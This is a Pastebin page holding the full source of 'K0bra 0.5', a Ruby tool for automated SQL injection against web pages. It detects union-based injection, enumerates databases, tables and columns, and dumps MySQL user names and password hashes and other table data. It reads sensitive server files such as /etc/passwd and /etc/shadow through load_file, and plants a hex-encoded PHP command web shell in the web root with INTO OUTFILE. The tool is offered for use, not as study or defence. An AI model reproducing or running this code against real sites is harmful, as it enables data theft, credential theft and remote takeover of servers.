API tools faq
paste
Advertisement
Doddy

K0bra 0.5

Doddy
Jan 1st, 2015
850
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Ruby 22.62 KB | None | 0 0
raw download clone embed print report
  1. #!usr/bin/ruby
  2. #K0bra 0.5
  3. #(C) Doddy Hackman 2015
  4.  
  5. require "net/http"
  6. require "open-uri"
  7.  
  8. $files = ['C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog']
  9.  
  10. def toma(web)
  11.   begin
  12.     return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  13.   rescue
  14.     return "Error"
  15.   end
  16. end
  17.  
  18. def decode_hex(text)
  19.   text = text.sub("0x","")
  20.   return [text].pack('H*')[0]
  21. end
  22.  
  23. def encode_hex(text)
  24.   return "0x"+text.unpack('H*')[0]
  25. end
  26.  
  27. def copyright()
  28.   print "\n-- == (C) Doddy Hackman 2015 == --\n"
  29.   gets.chomp
  30.   exit(1)
  31. end
  32.  
  33. def installer()
  34.   dir = Dir::pwd+"/"+"logs_webs"
  35.   if not FileTest::directory?(dir)
  36.     Dir::mkdir(dir)
  37.   end
  38. end
  39.  
  40. def savefile(file,text)
  41.   url = URI.parse(file)
  42.   save = File.open("logs_webs/"+url.host+".txt","a")
  43.   save.puts text+"\n"
  44.   save.close
  45. end
  46.  
  47. def bypass(op)
  48.   if op=="--"
  49.     return "+","--"
  50.   elsif op=="/*"
  51.    return "/**/","/**/"
  52.   elsif op=="%20"
  53.    return "%20","%00"
  54.   else
  55.    return "+","--"    
  56.   end
  57. end
  58.  
  59. def head()
  60.   clean()
  61.   print "
  62.  
  63. @      @@   @            
  64. @@     @  @ @@            
  65. @ @@  @  @  @ @   @ @ @@@
  66. @ @   @  @  @@ @ @@@ @  @
  67. @@    @  @  @  @  @   @@@
  68. @ @   @  @  @  @  @  @  @
  69. @@@ @   @@   @@@  @@@ @@@@@
  70.  
  71. "
  72. end
  73.  
  74. def volverinicio()
  75.   print "\n\n[+] Press any key to continue\n\n"
  76.   gets.chomp
  77.   inicio()
  78. end
  79.  
  80. def clean()
  81.   if RUBY_PLATFORM=~/win/ or RUBY_PLATFORM=~/min/
  82.     system("cls")
  83.   else
  84.     system("clear")
  85.   end
  86. end
  87.  
  88. def retorno(url,by)
  89.   print "\n[+] Finished"
  90.   print "\n\n[+] Press any key to continue\n\n"
  91.   gets.chomp
  92.   central(url,by)
  93. end
  94.  
  95. def gettables(url,by)
  96.   pass1,pass2 = bypass(by)
  97.   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))")
  98.   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
  99.   print "\n[+] Getting tables ...\n\n"
  100.   code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  101.   if code1=~/K0BRA(.*?)K0BRA/
  102.     total = $1
  103.     print "[+] Tables Found : ",total,"\n\n"
  104.     savefile(url,"\n[+] Tables Found : #{total}\n")
  105.     for num in ("17"..total)
  106.       code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+num+",1"+pass2)
  107.       if code2=~/K0BRA(.*?)K0BRA/
  108.         table = $1
  109.         print "[+] Table Found : "+table+"\n"
  110.         savefile(url,"[+] Table Found : #{table}")
  111.       end
  112.     end
  113.   else
  114.     print "[-] Not Found\n"
  115.   end
  116. end
  117.  
  118. def getcolumns(url,by,tablex)
  119.   tablexa = encode_hex(tablex)
  120.   pass1,pass2 = bypass(by)
  121.   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))")
  122.   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
  123.   print "\n[+] Getting columns ...\n\n"
  124.   code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass2)
  125.   if code1=~/K0BRA(.*?)K0BRA/
  126.     total = $1
  127.     print "[+] Columns Found : ",total,"\n\n"
  128.     savefile(url,"\n[+] Table : #{tablex}")
  129.     savefile(url,"[+] Columns Found : #{total}\n")
  130.     for num in ("0"..total)
  131.       code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass1+"limit"+pass1+num+",1"+pass2)
  132.       if code2=~/K0BRA(.*?)K0BRA/
  133.         table = $1
  134.         print "[+] Column Found : "+table+"\n"
  135.         savefile(url,"[+] Column Found : #{table}")
  136.       end
  137.     end
  138.   else
  139.     print "[-] Not Found\n"
  140.   end
  141. end
  142.  
  143. def getdbs(url,by)
  144.   pass1,pass2 = bypass(by)
  145.   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  146.   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))")
  147.   print "\n[+] Getting DBS ...\n\n"
  148.   code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
  149.   if code1=~/K0BRA(.*?)K0BRA/
  150.     total = $1
  151.     print "[+] DBS Found : ",total,"\n\n"
  152.     savefile(url,"\n[+] DBS Found : #{total}\n")
  153.     for num in ("0"..total)
  154.       code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+num+",1"+pass2)
  155.       if code2=~/K0BRA(.*?)K0BRA/
  156.         table = $1
  157.         print "[+] DB Found : "+table+"\n"
  158.         savefile(url,"[+] DB Found : #{table}")
  159.       end
  160.     end
  161.   else
  162.     print "[-] Not Found\n"
  163.   end
  164. end
  165.  
  166. def gettablesbydb(url,by,dbx)
  167.   data  = encode_hex(dbx)
  168.   pass1,pass2 = bypass(by)
  169.   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  170.   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
  171.   print "\n[+] Getting tables ...\n\n"
  172.   code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass2)
  173.   if code1=~/K0BRA(.*?)K0BRA/
  174.     total = $1
  175.     print "[+] Tables Found : ",total,"\n\n"
  176.     savefile(url,"\n[+] DBS : #{dbx}")
  177.     savefile(url,"[+] Tables Found : #{total}\n")
  178.     for num in ("0"..total)
  179.       code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
  180.       if code2=~/K0BRA(.*?)K0BRA/
  181.         table = $1
  182.         print "[+] Table Found : "+table+"\n"
  183.         savefile(url,"[+] Table Found : #{table}")
  184.       end
  185.     end
  186.   else
  187.     print "[-] Not Found\n"
  188.   end
  189. end
  190.  
  191. def getcolumnsbydb(url,by,db,tab)
  192.   data = encode_hex(db)
  193.   tabx = encode_hex(tab)
  194.  
  195.   pass1,pass2 = bypass(by)
  196.   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  197.   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
  198.   print "\n[+] Getting columns ...\n\n"
  199.   code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass2)
  200.   if code1=~/K0BRA(.*?)K0BRA/
  201.     total = $1
  202.     print "[+] Columns Found : ",total,"\n\n"
  203.     savefile(url,"\n[+] DB : #{db}")
  204.     savefile(url,"[+] Table : #{tab}")
  205.     savefile(url,"[+] Columns Found : #{total}\n")
  206.     for num in ("0"..total)
  207.       code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
  208.       if code2=~/K0BRA(.*?)K0BRA/
  209.         table = $1
  210.         print "[+] Column Found : "+table+"\n"
  211.         savefile(url,"[+] Column Found : #{table}")
  212.       end
  213.     end
  214.   else
  215.     print "[-] Not Found\n"
  216.   end
  217. end
  218.  
  219. def mysqluser(url,by)
  220.   pass1,pass2 = bypass(by)
  221.   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  222.   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))")
  223.    print "\n[+] Searching mysql.user\n\n"
  224.   code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  225.   if code1=~/K0BRA(.*?)K0BRA/
  226.     total = $1
  227.     print "[+] Users Mysql Found : ",total,"\n\n"
  228.     savefile(url,"[+] Users Mysql Found : "+total+"\n")
  229.     for num in ("0"..total)
  230.       code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+num+",1"+pass2)
  231.       if code2=~/K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2/
  232.         host,user,passw = $1,$2,$3
  233.         print "[Host] : "+host
  234.         print " [User] : "+user
  235.         print " [Pass] : "+passw+"\n"  
  236.         savefile(url,"[Host] : "+host)
  237.         savefile(url,"[User] : "+user)
  238.         savefile(url,"[Pass] : "+passw+"\n")
  239.       end
  240.     end
  241.   else
  242.     print "[-] Not Found\n"
  243.   end
  244. end
  245.  
  246. def details(url,by)
  247.   pass1,pass2 = bypass(by)
  248.   hextest = "0x2f6574632f706173737764" #/etc/passwd
  249.   hextest = "0x633A2F78616D70702F726561642E747874" #c:/xampp/read.txt
  250.   web1 = url.sub(/hackman/,"0x4b30425241")
  251.   web2 = url.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
  252.   web3 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))")
  253.    print "\n[+] Extrating information of the DB\n"
  254.   code1 = toma(web2)
  255.   if code1=~/K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA/
  256.     user,data,ver = $1,$2,$3
  257.     print "\n[+] Username : "+user
  258.     print "\n[+] Database : "+data
  259.     print "\n[+] Version : "+ver+"\n\n"
  260.     savefile(url,"\n[+] Username : "+user)
  261.     savefile(url,"[+] Database : "+data)
  262.     savefile(url,"[+] Version : "+ver+"\n")
  263.   else
  264.     print "[-] Not Found\n"
  265.   end
  266.    code2 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  267.    code3 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  268.    code4 = toma(web3)
  269.    if code2=~/K0BRA/
  270.      print "[+] Mysql User : ON\n"
  271.      savefile(url,"[+] Mysqluser : ON")
  272.    end
  273.    if code3=~/K0BRA/
  274.      print "[+] information_schema : ON\n"
  275.      savefile(url,"[+] information_schema : ON")
  276.    end
  277.    if code4=~/ERTOR854/
  278.      print "[+] load_file : ON\n"
  279.      savefile(url,"[+] load_file : ON")
  280.    end  
  281.    savefile(url,"") #espacio en blanco
  282.  end
  283.  
  284.  def dumper(url,by,table,col1,col2)
  285.   pass1,pass2 = bypass(by)
  286.   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  287.   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,"+col2+",0x4b30425241)))")
  288.   print "\n[+] Getting Values ...\n\n"
  289.   code1 = toma(web1+pass1+"from"+pass1+table+pass2)
  290.   if code1=~/K0BRA(.*?)K0BRA/
  291.     total = $1
  292.     savefile(url,"\n[+] Table : "+table)
  293.     savefile(url,"[+] Column 1 : "+col1)
  294.     savefile(url,"[+] Column 2 : "+col2)
  295.     print "[+] Values Found : ",total,"\n"
  296.     savefile(url,"\n[+] Values Found : #{total}\n")
  297.     for num in ("0"..total)
  298.       code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+num+",1"+pass2)
  299.       if code2=~/K0BRA(.*)K0BRA(.*)K0BRA/
  300.         uno,dos = $1,$2
  301.         print "\n[+] "+col1+" : "+uno+"\n"
  302.         print "[+] "+col2+" : "+dos+"\n"
  303.         savefile(url,"\n[+] "+col1+" : "+uno)
  304.         savefile(url,"[+] "+col2+" : "+dos)
  305.       end
  306.     end
  307.   else
  308.     print "[-] Not Found\n"
  309.   end
  310. end
  311.  
  312. def fuzzfile(url,by)
  313.   pass1,pass2 = bypass(by)
  314.   print "\n[+] Fuzzing Files with load_file ....\n"
  315.   $files.each do |file|
  316.     res = file
  317.     file = file.chomp
  318.     file = encode_hex(file)
  319.     web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
  320.     code = toma(web1)
  321.     if code=~/ERTOR854(.*?)ERTOR854/m
  322.       print "\n\n[File Found] : ",res
  323.       print "\n\n[Source Start]\n"
  324.       print $1
  325.       print "\n[Source End]"
  326.       savefile(url,"\n[File Found] : "+res)
  327.       savefile(url,"\n[Source Start]\n")
  328.       savefile(url,$1)
  329.       savefile(url,"\n[Source End]")
  330.     end    
  331.   end
  332.   print "\n"
  333. end
  334.  
  335. def abrirfile(url,by,file)
  336.   pass1,pass2 = bypass(by)
  337.   print "\n[+] Opening file ....\n"
  338.   res = file
  339.   file = encode_hex(file)
  340.     web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
  341.     code = toma(web1)
  342.     if code=~/ERTOR854(.*?)ERTOR854/m
  343.       print "\n\n[File Found] : ",res
  344.       print "\n\n[Source Start]\n"
  345.       print $1
  346.       print "\n[Source End]\n"
  347.       savefile(url,"\n[File Found] : "+res)
  348.       savefile(url,"\n[Source Start]\n")
  349.       savefile(url,$1)
  350.       savefile(url,"\n[Source End]\n")
  351.     else
  352.       print "\n\n[-] Error\n\n"
  353.     end
  354.        
  355. end
  356.  
  357. def into(url,by,full,dir)
  358.   pass1,pass2 = bypass(by)
  359.   linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
  360.   lugar = full+"/cmd.php"
  361.   lugardos = dir+"/cmd.php"
  362.   h = URI.parse(url)
  363.   webtest = "http://"+h.host+lugardos
  364.   web1 = url.sub(/hackman/,linea)
  365.   formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2
  366.   toma(formandoweb)
  367.   code = toma(webtest)
  368.   if code=~/Mini Shell By Doddy/
  369.     print "\n[Shell Up] : "+webtest+"\n"
  370.     savefile(url,"\n[Shell Up] : "+webtest+"\n")
  371.   else
  372.     print "\n\n[-] Error\n"
  373.   end
  374. end
  375.  
  376. def central(url,by)
  377.   clean()
  378.   head()
  379.   print "\n\n[+] Page : #{url}\n"
  380.   print "[+] ByPass : #{by}\n\n"
  381.  
  382.   print "\n[information_schema]\n\n"
  383.   print "1 - Show tables\n"
  384.   print "2 - Show columns of the a table\n"
  385.   print "3 - Show databases\n"
  386.   print "4 - Show tables from the a DB\n"
  387.   print "5 - Show columns from the a table of the DB\n"
  388.   print "\n[mysql.user]\n\n"
  389.   print "6 - Show users\n"
  390.   print "\n[Others]\n\n"
  391.   print "7 - Show details\n"
  392.   print "8 - Dump data\n"
  393.   print "9 - Fuzz Files with load_file\n"
  394.   print "10 - Load files with load_file\n"
  395.   print "11 - Create Shell\n"
  396.   print "12 - Show log\n"
  397.   print "13 - Change target\n"
  398.   print "14 - Exit\n\n\n"
  399.  
  400.   print "[+] Option : "
  401.   op = gets.chomp
  402.   print "\n"
  403.    
  404.   if op == "1"
  405.     gettables(url,by)
  406.     retorno(url,by)
  407.   elsif op == "2"
  408.     print "\n[+] Table : "
  409.     table = gets.chomp
  410.     getcolumns(url,by,table)
  411.     retorno(url,by)
  412.   elsif op == "3"
  413.     getdbs(url,by)
  414.     retorno(url,by)
  415.   elsif op == "4"
  416.     print "\n[+] DB : "
  417.     db = gets.chomp
  418.     gettablesbydb(url,by,db)
  419.     retorno(url,by)
  420.   elsif op == "5"
  421.     print "\n[+] DB : "
  422.     db = gets.chomp
  423.     print "\n[+] Table : "
  424.     tab = gets.chomp
  425.     getcolumnsbydb(url,by,db,tab)
  426.     retorno(url,by)
  427.   elsif op == "6"
  428.     mysqluser(url,by)
  429.     retorno(url,by)
  430.   elsif op == "7"
  431.     details(url,by)
  432.     retorno(url,by)
  433.   elsif op == "8"
  434.     print "\n[+] Table : "
  435.     table = gets.chomp
  436.     print "\n[+] Column 1 : "
  437.     col1 = gets.chomp
  438.     print "\n[+] Column 2 : "
  439.     col2 = gets.chomp
  440.     dumper(url,by,table,col1,col2)
  441.     retorno(url,by)
  442.   elsif op == "9"
  443.     fuzzfile(url,by)
  444.     retorno(url,by)
  445.   elsif op == "10"
  446.     print "\n[+] File : "
  447.     file = gets.chomp
  448.     abrirfile(url,by,file)
  449.     retorno(url,by)
  450.   elsif op == "11"
  451.     print "\n[Full Source Discloure] : "
  452.     full = gets.chomp
  453.     print "\n[Directory to test] : "
  454.     dir = gets.chomp
  455.     into(url,by,full,dir)
  456.     retorno(url,by)
  457.   elsif op == "12"
  458.     urla = URI.parse(url)
  459.     ar = "logs_webs/"+urla.host+".txt"
  460.     system("start #{ar}")
  461.     retorno(url,by)
  462.   elsif op == "13"
  463.     inicio()
  464.   elsif op == "14"
  465.     copyright()
  466.   else
  467.     retorno(url,by)
  468.   end
  469. end
  470.  
  471. def findlength(url,by)
  472.   pass1,pass2 = bypass(by)
  473.   z = "1"
  474.   print "\n[+] Finding columns lenght ...\n\n"
  475.   x = "concat(0x4b30425241,1,0x4b30425241)"
  476.   for num in ('2'..'25')
  477.     z = z+","+num
  478.     x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)"
  479.     code = toma(url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+x)
  480.     if code=~/K0BRA(.*?)K0BRA/
  481.       print "[+] The Page has "+num+" columns\n"
  482.       print "[+] The number "+$1+" print data"
  483.       z = z.sub($1,"hackman")
  484.       sqli = url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+z
  485.       savefile(url,"[+] SQLI : "+sqli)
  486.       savefile(url,"[+] Bypass : "+by+"\n")
  487.       central(sqli,by)
  488.     end
  489.   end
  490.   print "[-] Columns lenght not found\n"
  491.   volverinicio()
  492. end
  493.  
  494. def testvul(page,by)
  495.   pass1,pass2 = bypass(by)
  496.   print "\n\n[+] Testing vulnerability ...\n\n"
  497.   codeuno = toma(page+"1"+pass1+"and"+pass1+"1=0"+pass2)
  498.   codedos = toma(page+"1"+pass1+"and"+pass1+"1=1"+pass2)
  499.   if codeuno != codedos
  500.     print "[+] Vulnerable !\n"
  501.     findlength(page,by)
  502.   else
  503.     print "[-] Not vulnerable\n"
  504.     print "\n[+] Scan anyway y/n : "
  505.     op = gets.chomp
  506.     if op == "y"
  507.       findlength(page,by)
  508.     else
  509.       volverinicio()
  510.   end
  511.  end  
  512. end
  513.  
  514. def inicio()
  515.   clean()
  516.   head()
  517.   print "\n\n[+] Page : "
  518.   page = gets.chomp
  519.   print "\n[+] Bypass : "
  520.   by = gets.chomp
  521.   if page=~/hackman/
  522.     central(page,by)
  523.   else
  524.     testvul(page,by)
  525.   end
  526. end
  527.  
  528. installer()
  529. inicio()
  530.  
  531. # The End ?
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!